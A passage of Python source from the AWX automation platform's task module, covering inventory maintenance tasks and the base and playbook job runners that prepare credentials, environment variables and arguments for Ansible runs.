logger.warn(f"Failed to even try to send notifications for job '{uj}' due to job not being in finished state.")
@task(queue=get_local_queuename)
def update_inventory_computed_fields(inventory_id):
"""
Signal handler and wrapper around inventory.update_computed_fields to
prevent unnecessary recursive calls.
"""
i = Inventory.objects.filter(id=inventory_id)
if not i.exists():
logger.error("Update Inventory Computed Fields failed due to missing inventory: " + str(inventory_id))
return
i = i[0]
try:
i.update_computed_fields()
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Exiting duplicate update_inventory_computed_fields task.')
return
raise
def update_smart_memberships_for_inventory(smart_inventory):
current = set(SmartInventoryMembership.objects.filter(inventory=smart_inventory).values_list('host_id', flat=True))
new = set(smart_inventory.hosts.values_list('id', flat=True))
additions = new - current
removals = current - new
if additions or removals:
with transaction.atomic():
if removals:
SmartInventoryMembership.objects.filter(inventory=smart_inventory, host_id__in=removals).delete()
if additions:
add_for_inventory = [SmartInventoryMembership(inventory_id=smart_inventory.id, host_id=host_id) for host_id in additions]
SmartInventoryMembership.objects.bulk_create(add_for_inventory, ignore_conflicts=True)
logger.debug(
'Smart host membership cached for {}, {} additions, {} removals, {} total count.'.format(
smart_inventory.pk, len(additions), len(removals), len(new)
)
)
return True # changed
return False
@task(queue=get_local_queuename)
def update_host_smart_inventory_memberships():
smart_inventories = Inventory.objects.filter(kind='smart', host_filter__isnull=False, pending_deletion=False)
changed_inventories = set([])
for smart_inventory in smart_inventories:
try:
changed = update_smart_memberships_for_inventory(smart_inventory)
if changed:
changed_inventories.add(smart_inventory)
except IntegrityError:
logger.exception('Failed to update smart inventory memberships for {}'.format(smart_inventory.pk))
# Update computed fields for changed inventories outside atomic action
for smart_inventory in changed_inventories:
smart_inventory.update_computed_fields()
@task(queue=get_local_queuename)
def delete_inventory(inventory_id, user_id, retries=5):
# Delete inventory as user
if user_id is None:
user = None
else:
try:
user = User.objects.get(id=user_id)
except Exception:
user = None
with ignore_inventory_computed_fields(), ignore_inventory_group_removal(), impersonate(user):
try:
i = Inventory.objects.get(id=inventory_id)
for host in i.hosts.iterator():
host.job_events_as_primary_host.update(host=None)
i.delete()
emit_channel_notification('inventories-status_changed', {'group_name': 'inventories', 'inventory_id': inventory_id, 'status': 'deleted'})
logger.debug('Deleted inventory {} as user {}.'.format(inventory_id, user_id))
except Inventory.DoesNotExist:
logger.exception("Delete Inventory failed due to missing inventory: " + str(inventory_id))
return
except DatabaseError:
logger.exception('Database error deleting inventory {}, but will retry.'.format(inventory_id))
if retries > 0:
time.sleep(10)
delete_inventory(inventory_id, user_id, retries=retries - 1)
def with_path_cleanup(f):
@functools.wraps(f)
def _wrapped(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
finally:
for p in self.cleanup_paths:
try:
if os.path.isdir(p):
shutil.rmtree(p, ignore_errors=True)
elif os.path.exists(p):
os.remove(p)
except OSError:
logger.exception("Failed to remove tmp file: {}".format(p))
self.cleanup_paths = []
return _wrapped
class BaseTask(object):
model = None
event_model = None
abstract = True
def __init__(self):
self.cleanup_paths = []
self.parent_workflow_job_id = None
self.host_map = {}
self.guid = GuidMiddleware.get_guid()
self.job_created = None
def update_model(self, pk, _attempt=0, **updates):
"""Reload the model instance from the database and update the
given fields.
"""
try:
with transaction.atomic():
# Retrieve the model instance.
instance = self.model.objects.get(pk=pk)
# Update the appropriate fields and save the model
# instance, then return the new instance.
if updates:
update_fields = ['modified']
for field, value in updates.items():
setattr(instance, field, value)
update_fields.append(field)
if field == 'status':
update_fields.append('failed')
instance.save(update_fields=update_fields)
return instance
except DatabaseError as e:
# Log out the error to the debug logger.
logger.debug('Database error updating %s, retrying in 5 ' 'seconds (retry #%d): %s', self.model._meta.object_name, _attempt + 1, e)
# Attempt to retry the update, assuming we haven't already
# tried too many times.
if _attempt < 5:
time.sleep(5)
return self.update_model(pk, _attempt=_attempt + 1, **updates)
else:
logger.error('Failed to update %s after %d retries.', self.model._meta.object_name, _attempt)
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"container_options": ['--user=root'],
}
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if cred.has_inputs(field_names=('host', 'username', 'password')):
path = os.path.split(private_data_dir)[0]
with open(path + '/auth.json', 'w') as authfile:
os.chmod(authfile.name, stat.S_IRUSR | stat.S_IWUSR)
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
token = "{}:{}".format(username, password)
auth_data = {'auths': {host: {'auth': b64encode(token.encode('UTF-8')).decode('UTF-8')}}}
authfile.write(json.dumps(auth_data, indent=4))
params["container_options"].append(f'--authfile={authfile.name}')
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
# Using z allows the dir to mounted by multiple containers
# Uppercase Z restricts access (in weird ways) to 1 container at a time
params['container_volume_mounts'].append(f'{this_path}:{this_path}:z')
return params
def build_private_data(self, instance, private_data_dir):
"""
Return SSH private key data (only if stored in DB as ssh_key_data).
Return structure is a dict of the form:
"""
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
pdd_wrapper_path = tempfile.mkdtemp(prefix=f'pdd_wrapper_{instance.pk}_', dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(pdd_wrapper_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(pdd_wrapper_path)
path = tempfile.mkdtemp(prefix='awx_%s_' % instance.pk, dir=pdd_wrapper_path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
# Ansible runner requires that project exists,
# and we will write files in the other folders without pre-creating the folder
for subfolder in ('project', 'inventory', 'env'):
runner_subfolder = os.path.join(path, subfolder)
if not os.path.exists(runner_subfolder):
os.mkdir(runner_subfolder)
return path
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
Returns a dictionary i.e.,
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
try:
os.mkdir(os.path.join(private_data_dir, 'env'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(private_data_dir, 'env', 'ssh_key')
ansible_runner.utils.open_fifo_write(path, data.encode())
private_data_files['credentials']['ssh'] = path
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
handle, path = tempfile.mkstemp(dir=os.path.join(private_data_dir, 'env'))
f = os.fdopen(handle, 'w')
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
private_data_files['credentials'][credential] = path
for credential, data in private_data.get('certificates', {}).items():
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir, mode=0o700)
path = os.path.join(artifact_dir, 'ssh_key_data-cert.pub')
with open(path, 'w') as f:
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
return private_data_files
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
def build_extra_vars_file(self, instance, private_data_dir):
"""
Build ansible yaml file filled with extra vars to be passed via -e@file.yml
"""
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'extravars')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
f.write(yaml.safe_dump(vars))
else:
f.write(safe_dump(vars, safe_dict))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def add_awx_venv(self, env):
env['VIRTUAL_ENV'] = settings.AWX_VENV_PATH
if 'PATH' in env:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin") + ":" + env['PATH']
else:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin")
def build_env(self, instance, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
if self.instance.execution_environment is None:
raise RuntimeError('The project could not sync because there is no Execution Environment.')
ee_cred = self.instance.execution_environment.credential
if ee_cred:
verify_ssl = ee_cred.get_input('verify_ssl')
if not verify_ssl:
pdd_wrapper_path = os.path.split(private_data_dir)[0]
registries_conf_path = os.path.join(pdd_wrapper_path, 'registries.conf')
host = ee_cred.get_input('host')
with open(registries_conf_path, 'w') as registries_conf:
os.chmod(registries_conf.name, stat.S_IRUSR | stat.S_IWUSR)
lines = [
'[[registry]]',
'location = "{}"'.format(host),
'insecure = true',
]
registries_conf.write('\n'.join(lines))
# Podman >= 3.1.0
env['CONTAINERS_REGISTRIES_CONF'] = registries_conf_path
# Podman < 3.1.0
env['REGISTRIES_CONFIG_PATH'] = registries_conf_path
return env
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
script_data = instance.inventory.get_script_data(**script_params)
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.host_map = {hostname: hv.pop('remote_tower_id', '') for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items()}
json_data = json.dumps(script_data)
path = os.path.join(private_data_dir, 'inventory')
fn = os.path.join(path, 'hosts')
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR | stat.S_IXUSR | stat.S_IWUSR)
f.write('#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json_data)
return fn
def build_args(self, instance, private_data_dir, passwords):
raise NotImplementedError
def write_args_file(self, private_data_dir, args):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'cmdline')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(ansible_runner.utils.args2cmdline(*args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
else:
job_timeout = 0
return job_timeout
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
def pre_run_hook(self, instance, private_data_dir):
"""
Hook for any steps to run before the job/task starts
"""
instance.log_lifecycle("pre_run")
def post_run_hook(self, instance, status):
"""
Hook for any steps to run before job/task is marked as complete.
"""
instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir, fact_modification_times):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
job_profiling_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
awx_profiling_dir = '/var/log/tower/playbook_profiling/'
collections_info = os.path.join(private_data_dir, 'artifacts/', 'collections.json')
ansible_version_file = os.path.join(private_data_dir, 'artifacts/', 'ansible_version.txt')
if not os.path.exists(awx_profiling_dir):
os.mkdir(awx_profiling_dir)
if os.path.isdir(job_profiling_dir):
shutil.copytree(job_profiling_dir, os.path.join(awx_profiling_dir, str(instance.pk)))
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
def event_handler(self, event_data):
#
# ⚠️ D-D-D-DANGER ZONE ⚠️
# This method is called once for *every event* emitted by Ansible
# Runner as a playbook runs. That means that changes to the code in
# this method are _very_ likely to introduce performance regressions.
#
# Even if this function is made on average .05s slower, it can have
# devastating performance implications for playbooks that emit
# tens or hundreds of thousands of events.
#
# Proceed with caution!
#
"""
Ansible runner puts a parent_uuid on each event, no matter what the type.
AWX only saves the parent_uuid if the event is for a Job.
"""
# cache end_line locally for RunInventoryUpdate tasks
# which generate job events from two 'streams':
# ansible-inventory and the awx.main.commands.inventory_import
# logger
if isinstance(self, RunInventoryUpdate):
self.end_line = event_data['end_line']
if event_data.get(self.event_data_key, None):
if self.event_data_key != 'job_id':
event_data.pop('parent_uuid', None)
if self.parent_workflow_job_id:
event_data['workflow_job_id'] = self.parent_workflow_job_id
event_data['job_created'] = self.job_created
if self.host_map:
host = event_data.get('event_data', {}).get('host', '').strip()
if host:
event_data['host_name'] = host
if host in self.host_map:
event_data['host_id'] = self.host_map[host]
else:
event_data['host_name'] = ''
event_data['host_id'] = ''
if event_data.get('event') == 'playbook_on_stats':
event_data['host_map'] = self.host_map
if isinstance(self, RunProjectUpdate):
# it's common for Ansible's SCM modules to print
# error messages on failure that contain the plaintext
# basic auth credentials (username + password)
# it's also common for the nested event data itself (['res']['...'])
# to contain unredacted text on failure
# this is a _little_ expensive to filter
# with regex, but project updates don't have many events,
# so it *should* have a negligible performance impact
task = event_data.get('event_data', {}).get('task_action')
try:
if task in ('git', 'svn'):
event_data_json = json.dumps(event_data)
event_data_json = UriCleaner.remove_sensitive(event_data_json)
event_data = json.loads(event_data_json)
except json.JSONDecodeError:
pass
if 'event_data' in event_data:
event_data['event_data']['guid'] = self.guid
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
self.event_ct += 1
'''
Handle artifacts
'''
if event_data.get('event_data', {}).get('artifact_data', {}):
self.instance.artifacts = event_data['event_data']['artifact_data']
self.instance.save(update_fields=['artifacts'])
return False
def cancel_callback(self):
"""
Ansible runner callback to tell the job when/if it is canceled
"""
unified_job_id = self.instance.pk
self.instance = self.update_model(unified_job_id)
if not self.instance:
logger.error('unified job {} was deleted while running, canceling'.format(unified_job_id))
return True
if self.instance.cancel_flag or self.instance.status == 'canceled':
cancel_wait = (now() - self.instance.modified).seconds if self.instance.modified else 0
if cancel_wait > 5:
logger.warn('Request to cancel {} took {} seconds to complete.'.format(self.instance.log_format, cancel_wait))
return True
return False
def finished_callback(self, runner_obj):
"""
Ansible runner callback triggered on finished run
"""
event_data = {
'event': 'EOF',
'final_counter': self.event_ct,
'guid': self.guid,
}
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
def status_handler(self, status_data, runner_config):
"""
Ansible runner callback triggered on status transition
"""
if status_data['status'] == 'starting':
job_env = dict(runner_config.env)
'''
Take the safe environment variables and overwrite
'''
for k, v in self.safe_env.items():
if k in job_env:
job_env[k] = v
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(runner_config.command), job_cwd=runner_config.cwd, job_env=job_env)
elif status_data['status'] == 'error':
result_traceback = status_data.get('result_traceback', None)
if result_traceback:
self.instance = self.update_model(self.instance.pk, result_traceback=result_traceback)
@with_path_cleanup
def run(self, pk, **kwargs):
"""
Run the job/task and capture its output.
"""
self.instance = self.model.objects.get(pk=pk)
if self.instance.execution_environment_id is None:
from awx.main.signals import disable_activity_stream
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, execution_environment=self.instance.resolve_execution_environment())
# self.instance because of the update_model pattern and when it's used in callback handlers
self.instance = self.update_model(pk, status='running', start_args='') # blank field to remove encrypted passwords
self.instance.websocket_emit_status("running")
status, rc = 'error', None
extra_update_fields = {}
fact_modification_times = {}
self.event_ct = 0
'''
Needs to be an object property because status_handler uses it in a callback context
'''
self.safe_env = {}
self.safe_cred_env = {}
private_data_dir = None
# store a reference to the parent workflow job (if any) so we can include
# it in event data JSON
if self.instance.spawned_by_workflow:
self.parent_workflow_job_id = self.instance.get_workflow_job().id
self.job_created = str(self.instance.created)
try:
self.instance.send_notification_templates("running")
private_data_dir = self.build_private_data_dir(self.instance)
self.pre_run_hook(self.instance, private_data_dir)
self.instance.log_lifecycle("preparing_playbook")
if self.instance.cancel_flag:
self.instance = self.update_model(self.instance.pk, status='canceled')
if self.instance.status != 'running':
# Stop the task chain and prevent starting the job if it has
# already been canceled.
self.instance = self.update_model(pk)
status = self.instance.status
raise RuntimeError('not starting %s task' % self.instance.status)
if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
# store a record of the venv used at runtime
if hasattr(self.instance, 'custom_virtualenv'):
self.update_model(pk, custom_virtualenv=getattr(self.instance, 'ansible_virtualenv_path', settings.ANSIBLE_VENV_PATH))
# Fetch "cached" fact data from prior runs and put on the disk
# where ansible expects to find it
if getattr(self.instance, 'use_fact_cache', False):
self.instance.start_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', str(self.instance.id), 'fact_cache'),
fact_modification_times,
)
# May have to serialize the value
private_data_files = self.build_private_data_files(self.instance, private_data_dir)
passwords = self.build_passwords(self.instance, kwargs)
self.build_extra_vars_file(self.instance, private_data_dir)
args = self.build_args(self.instance, private_data_dir, passwords)
env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files)
self.safe_env = build_safe_env(env)
credentials = self.build_credentials_list(self.instance)
for credential in credentials:
if credential:
credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
self.safe_env.update(self.safe_cred_env)
self.write_args_file(private_data_dir, args)
password_prompts = self.get_password_prompts(passwords)
expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
params = {
'ident': self.instance.id,
'private_data_dir': private_data_dir,
'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
'inventory': self.build_inventory(self.instance, private_data_dir),
'passwords': expect_passwords,
'envvars': env,
'settings': {
'job_timeout': self.get_instance_timeout(self.instance),
'suppress_ansible_output': True,
},
}
if isinstance(self.instance, AdHocCommand):
params['module'] = self.build_module_name(self.instance)
params['module_args'] = self.build_module_args(self.instance)
if getattr(self.instance, 'use_fact_cache', False):
# Enable Ansible fact cache.
params['fact_cache_type'] = 'jsonfile'
else:
# Disable Ansible fact cache.
params['fact_cache_type'] = ''
if self.instance.is_container_group_task or settings.IS_K8S:
params['envvars'].pop('HOME', None)
'''
Delete parameters if the values are None or empty array
'''
for v in ['passwords', 'playbook', 'inventory']:
if not params[v]:
del params[v]
self.dispatcher = CallbackQueueDispatcher()
self.instance.log_lifecycle("running_playbook")
if isinstance(self.instance, SystemJob):
res = ansible_runner.interface.run(
project_dir=settings.BASE_DIR,
event_handler=self.event_handler,
finished_callback=self.finished_callback,
status_handler=self.status_handler,
**params,
)
else:
receptor_job = AWXReceptorJob(self, params)
self.unit_id = receptor_job.unit_id
res = receptor_job.run()
if not res:
return
status = res.status
rc = res.rc
if status == 'timeout':
self.instance.job_explanation = "Job terminated due to timeout"
status = 'failed'
extra_update_fields['job_explanation'] = self.instance.job_explanation
# ensure failure notification sends even if playbook_on_stats event is not triggered
handle_success_and_failure_notifications.apply_async([self.instance.job.id])
except InvalidVirtualenvError as e:
extra_update_fields['job_explanation'] = e.message
logger.error('{} {}'.format(self.instance.log_format, e.message))
except Exception:
# this could catch programming or file system errors
extra_update_fields['result_traceback'] = traceback.format_exc()
logger.exception('%s Exception occurred while running task', self.instance.log_format)
finally:
logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.event_ct)
try:
self.post_run_hook(self.instance, status)
except PostRunError as exc:
if status == 'successful':
status = exc.status
extra_update_fields['job_explanation'] = exc.args[0]
if exc.tb:
extra_update_fields['result_traceback'] = exc.tb
except Exception:
logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
self.instance = self.update_model(pk)
self.instance = self.update_model(pk, status=status, emitted_events=self.event_ct, **extra_update_fields)
try:
self.final_run_hook(self.instance, status, private_data_dir, fact_modification_times)
except Exception:
logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
self.instance.websocket_emit_status(status)
if status != 'successful':
if status == 'canceled':
raise AwxTaskError.TaskCancel(self.instance, rc)
else:
raise AwxTaskError.TaskError(self.instance, rc)
@task(queue=get_local_queuename)
class RunJob(BaseTask):
"""
Run a job using ansible-playbook.
"""
model = Job
event_model = JobEvent
event_data_key = 'job_id'
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
def build_env(self, job, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack' and cred_files.get(cloud_cred, ''):
env['OS_CLIENT_CONFIG_FILE'] = to_container_path(cred_files.get(cloud_cred, ''), private_data_dir)
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
)
config_values = read_ansible_config(job.project.get_project_path(), list(map(lambda x: x[1], path_vars)))
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
# Define special extra_vars for AWX, combine with job.extra_vars.
extra_vars = job.awx_meta_vars()
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
# higher levels of privilege - those that have the ability create and
# edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
def build_credentials_list(self, job):
return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
d = super(RunJob, self).get_password_prompts(passwords)
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
